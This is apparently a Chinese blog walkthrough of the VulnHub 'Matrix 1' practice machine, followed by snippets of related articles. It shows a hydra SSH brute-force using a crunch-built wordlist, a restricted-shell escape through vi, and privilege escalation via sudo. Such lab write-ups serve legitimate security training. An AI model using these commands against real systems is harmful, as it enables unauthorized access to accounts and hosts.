vulnhub-Matrix 1靶机

最新推荐文章于 2024-10-02 12:31:42 发布
最新推荐文章于 2024-10-02 12:31:42 发布
阅读量280 收藏 10
点赞数 3
文章标签: 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wjSteve/article/details/142678809
版权

vulnhub:https://www.vulnhub.com/entry/matrix-1,259/

导入靶机,扫描IP

image-20240926163040957

靶机在192.168.81.6,扫描端口

image-20240926163152462

存在三个端口,有两个都是http服务,访问

80端口的网页没什么信息,31337的网页元素里有注释

image-20240926163508258

ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=

很明显Base64编码,解码

image-20240926163542724

echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

似乎是有一个文件,尝试访问一下,直接下载了

image-20240926163734710

查看发现是以前见过的brainfuck密码

image-20240926163746700

解密

You can enter into matrix as guest, with password k1ll0rXX Note: Actually, I forget last two characters so I have replaced with XX try your luck and

得知了账户guest的部分密码(缺少最后两位)

guest:k1ll0r

创建密码表

crunch 8 8 -t k1ll0r%@ -o dict.txt

使用字典爆破

hydra -l guest -P dict.txt 192.168.81.6 ssh

image-20240926164930720

得到了正确密码

guest:k1ll0r7n

连接

image-20240926165056476

这个shell很多命令不给用,尝试换一个

vi

:!/bin/bash

image-20240926165155426

获取到/bin/bash后,还需要设置环境变量

export SHELL=/bin/bash:$SHELL

export PATH=/usr/bin:$PATH

export PATH=/bin:$PATH

使用sudo -l查看可以使用的sudo

image-20240926165347624

可以使用任意sudo命令,切换root账户(这里需要输入密码,我之前看别的东西输入过了就不用输)

image-20240926165443976

提权成功,flag在root目录

生草工坊
关注
vulnhub靶机实战--Matrix:1
清唪的博客
04-13 3656
1.netdiscover 探测靶机ip地址 2.nmap -sS -A -p- +靶机ip 对靶机进行端口服务扫描 3.查看一下80端口网页发现并没有什么卵用 4.dirb http://+靶机ip 目录扫描 发现并没有什么卵用 5.我们上面的端口扫描有个31337端口可以尝试看看它有什么作用 我们来查看它的源代码 发现有base64 耶耶耶~~ 可以解码了 echo “ZWNobyAiVGhlbiB5b3UnbGwgc2VlL...
Vulnhub靶机实战——Matrix3
冠霖L的博客
11-15 922
下载地址: https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova 环境: VMware 15虚拟机软件 Matrix3靶机IP地址:192.168.220.160 Kali的IP地址:192.168.220.155 Matrix3靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155 ip add...
vulnhub-matrix-breakout-2-morpheus靶机测试报告
ccc_9wy的博客
10-02 1223
《黑客帝国2》为背景的靶机;基于渗透测试流程渗透matrix-breakout-2-morpheus靶机;webshell连接;反弹shell;dirtypipe漏洞;linux内核漏洞;上传exp提权;
vulnhub靶场】MATRIX-BREAKOUT: 2 MORPHEUS
信安是不可或缺的一部分!
06-05 1391
这是《黑客帝国》系列的第二部,副标题是《沉睡魔咒:1》。它的主题是回到第一部《黑客帝国》。你扮演的角色是Trinity,试图调查尼布甲尼撒号上的一台电脑,Cypher把其他人都锁在了电脑之外,这台电脑拥有解开谜团的钥匙。使用apache漏洞利用:(失败)在目录爆破时已经注定失败。192.168.200.254为net网卡dhcp地址。192.168.200.2为net网卡网关。网段为:192.168.200.0/24。靶机地址:192.168.200.134。192.168.200.1为物理机地址。
Vulnhub--Matrix: 3
weixin_45168704的博客
06-14 168
Matrix3
Vulnhub靶机笔记2——matrix-breakout-2-morpheus
2301_76329510的博客
04-30 971
发现存在robot.txt、graffiti.txt和graffiti.php三个敏感文件。这是个很牛逼的工具,使用它的linpeas_base.sh进行漏洞扫描。80端口发现两个重要文件test.php和robots.txt。使用CVE-2022-0847 DirtyPipe漏洞。发现可以输入的东西可以写入graffiti.txt。提权成功,这种方法虽然快,但是显得太简单。检测到一个cve-2022-0847漏洞。发现存在CVE-2022-0847漏洞。访问graffiti.txt。
vulnhub-Matrix3-靶场-打靶记录
lcc001114的博客
06-14 107
Matrix 3 虚拟机NAT 网络连接。
vulnhubMatrix:1靶机
wbplife的博客
08-07 434
cat /usr/share/crunch/charset.lst 选择要使用的crunch字典字符集范围。尝试访问Cypher.matrix网页,发现存在一个.bak文件,我们直接下载,用记事本打开后发现为BF编码。大体意思是:可以使用guest用户登录matrix,但是密码k1ll0rXX忘记了最后两位。使用kali自带crunch字典生成工具生成密码字典,密码一共8位,因为已知道6位了。尝试了很多命令,好多命令都不能使用,因为没有增加环境变量。到这里就已经完成了rbash逃逸,
vulnhub靶场Matrix-Breakout 2 Morpheus教程
m0_73248913的博客
01-22 4590
蚁剑的文件不是完整的,可能会有隐藏文件,此处简单一点直接在反弹shell双管齐下(一句话魔改一下)(记得要弄url编码)(干掉问号和空格和&)系统是Linux4.x|5.x看看有没有漏洞能利用,直接发现有漏洞能直接用CVE-2022-0847。此处有一个file变量,那么改变file变量可以直接对靶机文件修改,升值能随意创建文件。下载下去直接传上去跑就行(蚁剑直接传上去就可以了)(或者使用shell直接吓到靶机里)去到我进来写的shell看到一个图片看看,直接访问,毕竟没有扫出来。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub-Lampiao 靶机渗透
Majula
01-30 2275
WalkthroughDownloadDescriptionPen TestingInformation GatheringExploitationReview Download Lampião: 1 ~ VulnHub VM 镜像文件,直接选择 打开虚拟机 即可。 Description Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!
Vulnhub-Bulldog2 靶机渗透
Majula
02-04 361
WalkthroughDownloadDescriptionPen TestingScanningExploitationSolution ISolution IIPrivilege EscalationReview Download BULLDOG: 2 - VlunHub 靶机详细配置参考 Vulnhub-Bulldog1 靶机渗透 这篇文章,此篇不再赘述。 同样,启动靶机显示 IP 才算配置成功。 Description This is a Standard Boot-to-Root. Your
山东石油化工学院在辽宁2020-2024各专业最低录取分数及位次表.pdf
10-04
那些年,与你同分同位次的同学都去了哪里?全国各大学在辽宁2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
2024嵌入式大厂面经50套大厂高频面试题资料
最新发布
10-04
2024嵌入式大厂面经50套大厂高频面试题资料
eclipaint-eclipse插件
10-04
eclipaint-eclipse插件
基于XUI、XUtil、XAOP等框架的TemplateAppProject设计源码
10-04
该TemplateAppProject是一个基于XUI、XUtil、XAOP等框架构建的Android模版空壳工程,包含172个文件,涵盖68个Java源文件、64个XML配置文件、17个PNG图片文件、6个Gradle脚本文件、2个YAML配置文件、2个Git忽略文件、2个文本文件和1个Markdown文件。该工程集成了XPage、XUpdate和XHttp2等功能,旨在快速搭建Android应用开发环境。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值